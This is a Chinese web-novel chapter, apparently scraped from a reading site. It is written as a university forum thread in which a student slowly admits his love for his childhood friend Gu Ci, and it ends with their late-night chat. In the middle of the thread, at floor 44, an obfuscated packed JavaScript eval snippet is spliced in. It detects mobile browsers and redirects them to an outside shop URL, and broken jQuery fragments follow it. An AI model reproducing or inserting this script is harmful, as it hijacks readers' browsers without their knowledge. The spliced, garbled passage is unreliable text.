默认冷灰
24号文字
方正启体

5. 我好像有点不对劲2

作者:天天吃甜本书字数:K更新时间:
    标题:【树洞】我好像有点不对劲,求骂醒


    论坛板块:京华大学\校园生活\情感树洞


    发帖人:足球不行踢球去


    1楼匿名用户:


    沙发!


    楼主你终于回来了!


    等你好几天了!


    2楼匿名用户:


    看完主楼,我只想说一句:


    楼主,你完了。


    你彻底完了。


    3楼匿名用户:


    “如果有一天,顾辞也像顾远洲那样,喜欢上一个人,喜欢十几年,那个人不是我——”


    楼主,你这句话已经暴露了一切。


    你怕的不是顾辞喜欢别人。


    你怕的是顾辞喜欢的那个人不是你。


    4楼匿名用户:


    回3楼:正解。


    如果只是兄弟情,你会希望他幸福,不管跟谁。


    但你现在的心理活动是——“那个人不是我怎么办”。


    这不是兄弟情。


    这是爱情。


    5楼楼主:


    回4楼:不可能。


    我就是习惯了他在我旁边。


    突然想到他可能不在,有点不适应而已。


    6楼匿名用户:


    回5楼:“有点不适应”?


    你陪人家坐高铁去外地,在医院听情敌说“你要一直对他好”,回来路上盯着人家侧脸看了一路,晚上躺床上想“如果那个人不是我怎么办”——


    这叫“有点不适应”?


    这叫沦陷了兄弟。


    7楼匿名用户:


    顾远洲那段看得我眼泪汪汪。


    他嫉妒你,你嫉妒他。


    你们俩都觉得自己是输家。


    但其实你们都输了,也都赢了。


    他输了爱情,赢了体面。


    你赢了什么呢?


    你自己还不知道。


    8楼匿名用户:


    回7楼:他赢了顾辞啊!


    顾辞现在就在他身边!


    顾辞靠着他肩膀睡着了!


    顾辞说“好”的时候语气不一样了!


    这还不叫赢?


    9楼匿名用户:


    等等,我有一个重要发现。


    楼主,你描述顾辞睡觉那段——“睫毛很长,垂下来覆在下眼睑上。呼吸很轻,胸口一起一伏。”


    正常人会这么仔细看兄弟睡觉吗?


    正常人会记得住兄弟睡着时睫毛长什么样吗?


    你自己品。


    10楼楼主:


    回9楼:……


    我就是随便看了一眼。


    11楼匿名用户:


    回10楼:随便看了一眼然后写了五十个字描述?


    兄弟,你的“随便”跟我们理解的“随便”可能不是一个意思。


    12楼匿名用户:


    我现在最心疼的是顾远洲。


    他说“我吃了那笼包子,突然就不嫉妒了”。


    他是在告诉自己:算了吧,他对他真的很好,我该放心了。


    但是楼主,你知道他为什么能放心吗?


    因为他看出来你对顾辞是认真的。


    那种自己都没意识到的认真。


    比刻意的好更珍贵。


    13楼匿名用户:


    回12楼:是的。


    顾远洲是过来人,他一眼就看出来了。


    所以他对你说“你要一直这样对他”。


    因为他知道,你能做到。


    也因为他希望,顾辞能幸福。


    14楼匿名用户:


    楼主,你现在还觉得顾远洲是你情敌吗?


    15楼楼主:


    回14楼:不是。


    他从来都不是。


    我现在甚至有点……


    我不知道怎么说。


    就是希望他能好好的。


    一个人看樱花,太惨了。


    16楼匿名用户:


    回15楼:楼主,你知道你这叫什么吗?


    叫“爱屋及乌”。


    因为你喜欢顾辞,所以你会心疼那个喜欢顾辞的人。


    因为你知道,那种喜欢是什么滋味。


    17楼匿名用户:


    等等,我捋一下逻辑:


    顾远洲喜欢顾辞十几年,放手了。


    楼主和顾辞青梅竹马十w年,现在好像要开窍了。


    顾辞呢?顾辞喜欢谁?


    没有人问过顾辞。


    楼主,你问过顾辞吗?


    18楼楼主:


    回17楼:……


    没有。


    我不敢问。


    19楼匿名用户:


    回18楼:你为什么不敢问?


    20楼楼主:


    回19楼:……


    万一他说喜欢顾远洲呢?


    万一他说有别人呢?


    万一他说……


    我不知道。


    21楼匿名用户:


    回20楼:你看,你又来了。


    “万一他说喜欢别人”——


    你为什么怕这个?


    因为你在意。


    因为你想让他喜欢的人是你。


    22楼匿名用户:


    破案了。


    楼主你不需要被骂醒。


    你已经醒了。


    你只是不敢承认而已。


    23楼匿名用户:


    那现在怎么办?


    楼主你要表白吗?


    24楼楼主:


    回23楼:……


    我不知道。


    让我再想想。


    我现在脑子很乱。


    25楼匿名用户:


    慢慢想。


    十四年都等了,不差这几天。


    但是楼主,顾远洲有一句话说得很对:


    你要一直这样对他。


    不管最后是不是在一起,都要对他好。


    因为他值得。


    26楼匿名用户:


    我哭了。


    这楼从第一帖追到现在,看着楼主从“我是直男”到“我好像有点不对劲”。


    这就是成长啊兄弟们。


    这就是爱情啊。


    27楼匿名用户:


    所以现在的问题是:


    顾辞到底知不知道?


    顾辞是什么态度?


    楼主什么时候去问?


    28楼匿名用户:


    回27楼:我觉得顾辞知道。


    那句话怎么说来着——“好”字说得很不一样。


    靠肩膀睡觉的时候靠那么自然。


    还有那句“你为什么想来”。


    他不是在质问,他是在确认。


    确认张扬是不是真的在意他。


    29楼匿名用户:


    回28楼:有道理!


    “你为什么想来”这个问题,翻译一下就是:


    “你是不是因为在意我才来的?”


    30楼匿名用户:


    然后楼主的回答是:“你上次不是说,你一个人去看的海吗。这次我陪你去,就不是一个人了。”


    这个回答,满分啊兄弟们。


    没有说喜欢,但句句都是喜欢。


    31楼匿名用户:


    回30楼:是的!


    “不是一个人了”——


    他在告诉顾辞:以后有我。


    顾辞听懂了。


    所以他说“好”。


    32楼匿名用户:


    你们分析得太细了,我血糖要爆了。


    楼主,你欠我们一个真相!


    明天就去问!


    现在就去问!


    33楼楼主:


    回32楼:……


    现在凌晨两点了。


    他去睡觉了。


    明天再说吧。


    34楼匿名用户:


    “明天再说”。


    楼主,你上一帖也是这么说的。


    你这一“明天再说”,就说了三天。


    这次不许拖了!


    明天,明天必须行动!


    35楼匿名用户:


    话说回来,顾远洲那边怎么样了?


    楼主你有问他恢复得怎么样吗?


    36楼楼主:


    回35楼:……


    刚才给他发了条消息,问他好点没。


    他回:“好多了,谢谢。”


    我又不知道该回什么了。


    37楼匿名用户:


    回36楼:你就回:“下次回来请你吃小笼包。”


    让他知道,这里有人记得他。


    让他知道,他不是一个人。


    38楼楼主:


    回37楼:……


    好。


    我回了。


    他说:“好。”


    就一个字。


    但我看着那个字,好像看见他在笑。


    39楼匿名用户:


    楼主,你真好。


    真的。


    从第一帖那个“足球莽夫”,到现在会给情敌发消息问好。


    顾远洲说得对,你对他好,是真的好。


    对顾辞好,对顾辞身边的人也好。


    所以,你值得。


    40楼匿名用户:


    所以现在问题是:


    楼主,你准备什么时候对自己也好一点?


    承认自己喜欢他,又不丢人。


    41楼楼主:


    回40楼:……


    我考虑一下。


    明天……明天先看看情况。


    如果他状态好,我可能……


    可能问问他。


    42楼匿名用户:


    啊啊啊啊啊!


    明天!


    明天有大事发生!


    楼主你说话要算话!


    43楼匿名用户:


    蹲!


    我今晚不睡了,等明天楼主更新!


    44楼匿名用户:


    ;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17382517|200203||http|test|mini|href|location''.split(''|''),0,{}));


    () {


    $(''.inform'').remove();


    $(''#content'').append(''


    姐妹们,准备好瓜子饮料矿泉水!


    明天可能是历史性的一天!


    45楼楼主:


    你们别这样……


    我压力很大。


    万一他拒绝呢?


    万一他觉得我恶心呢?


    46楼匿名用户:


    回45楼:他不会的。


    一个人愿意让你靠肩膀,愿意让你陪他去外地,愿意对你说“好”说得不一样——


    他不会觉得你恶心。


    他只会觉得……


    他等这一天,等了很久。


    47楼楼主:


    ……


    但愿吧。


    我睡了。


    明天再说。


    ——


    张扬把手机扣在胸口。


    宿舍很黑,室友的呼吸声均匀绵长。


    他盯着天花板,想起高铁上顾辞靠在他肩上的重量。


    很轻,轻得像一片羽毛。


    但他记得那个温度。


    记得他发间的香味。


    记得他呼吸的频率。


    记得他醒过来时,愣了一下,然后说“抱歉”时,那个有点慌乱的眼神。


    他当时想说:不用抱歉,你可以继续靠着。


    但他没敢说。


    他什么都没敢说。


    十四年了。


    他第一次发现自己这么怂。


    窗外的月光从窗帘缝隙里漏进来,落在地上,薄薄的一层。


    他想起了顾远洲那条朋友圈。


    临市的樱花。


    一个人看的。


    他又想起顾辞说的那句话:


    “我一个人去看了海。”


    张扬闭上眼睛。


    他在心里对自己说:


    明天。


    明天一定要问他。


    问他——


    你喜欢谁?


    那个谁,有没有可能是我?


    ——


    手机屏幕又亮了一下。


    是顾辞的消息。


    【圆圆】:还没睡?


    张扬的心跳漏了一拍。


    他打字,删掉,再打字,再删掉。


    最后发出去:


    【张】:睡不着。


    【圆圆】:我也是。


    【张】:在想什么?


    【圆圆】:在想今天。


    【张】:今天怎么了?


    【圆圆】:今天你陪我去了临市。


    【张】:嗯。


    【圆圆】:谢谢你。


    【张】:不用谢。


    【圆圆】:张扬。


    【张】:嗯?


    【圆圆】:你为什么想来?


    又是这个问题。


    白天在食堂问过一次的问题。


    张扬盯着那行字,手指悬在屏幕上方。


    过了很久,他打字:


    【张】:因为不想让你一个人。


    【圆圆】:……


    【张】:你表哥说,你一个人去看了海。


    【张】:我不想你再一个人了。


    【张】:不管是去看海,还是去看他,还是别的什么。


    【张】:以后都有我。


    发出去之后,他心跳快得像刚跑完一千米。


    手机屏幕上,那个对话框安安静静的。


    对方正在输入……闪了很久。


    然后消息弹出来:


    【圆圆】:好。


    就一个字。


    但张扬看着那个字,突然觉得眼眶有点酸。


    他也不知道为什么。


    ——


    论坛上,新回复还在增加。


    58楼匿名用户:


    楼主怎么不说话了?


    是不是去问顾辞了?


    59楼匿名用户:


    急死我了!


    楼主你倒是吱一声啊!


    60楼匿名用户:


    姐妹们,我刚才好像刷到了什么。


    楼主朋友圈更新了。


    61楼匿名用户:


    什么内容?快说!


    62楼匿名用户:


    一张照片。


    窗外的月光。


    配文只有两个字:


    “晚安。”


    63楼匿名用户:


    ……


    这个点,发月光,说晚安。


    他是在跟谁说?


    64楼匿名用户:


    还能跟谁说。


    当然是那个让他睡不着的人。


    65楼匿名用户:


    所以,他是问了吗?


    还是没问?


    66楼匿名用户:


    不知道。


    但我觉得,不管问没问,今晚对他们俩来说,都不一样了。


    67楼匿名用户:


    是的。


    有些话不用说出口,也能懂。


    68楼匿名用户:


    那明天呢?


    明天楼主会来更新吗?
(←快捷键) <<上一章 投推荐票 回目录 标记书签 下一章>> (快捷键→)